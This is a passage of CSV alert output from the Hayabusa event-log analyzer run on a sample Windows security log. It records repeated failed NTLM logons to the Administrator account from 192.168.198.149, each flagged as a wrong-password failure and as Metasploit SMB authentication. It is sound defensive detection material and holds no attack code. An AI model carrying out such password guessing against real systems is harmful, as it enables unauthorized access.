Password,User: Administrator : Type: 3 : Workstation: u3k7dXu9o1vMkhby : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:59.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EDBt76dmYnPstFWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4yjzMC7cw0fe7gjS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.041 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eQOWCM7KP68DZTX9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kn9WWWqCIwfrPbie : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.119 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQcamLSzsXOjP6FL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6R6ZMRoYkAPB35Bq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.278 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ubqnZm0jmHNFCHrM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.349 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7ORQ8vL1oo6CkJXK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.419 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rDPl1SSddrWEs979 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: VrK7fENAr1lxFr9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wu4djhEVSMYBOmjF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.633 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e0NOdXhEkW6MskA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7nqxLHaOtkHHNAa1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.715 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCrCf73NtEpk5DUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.756 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YVFm1epksVGO1nFY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVehuMHvh5kVqRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sERZrNUHsKVEShCb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eaSNgw2hvkxLnQF8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FSYOWptgxHYTDv1x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Van1qwuRoWYPWrIY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyLCa9OHocazZKQ2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XxrR5iUsTI9LVnLL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TxMREacN0QfvL51B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
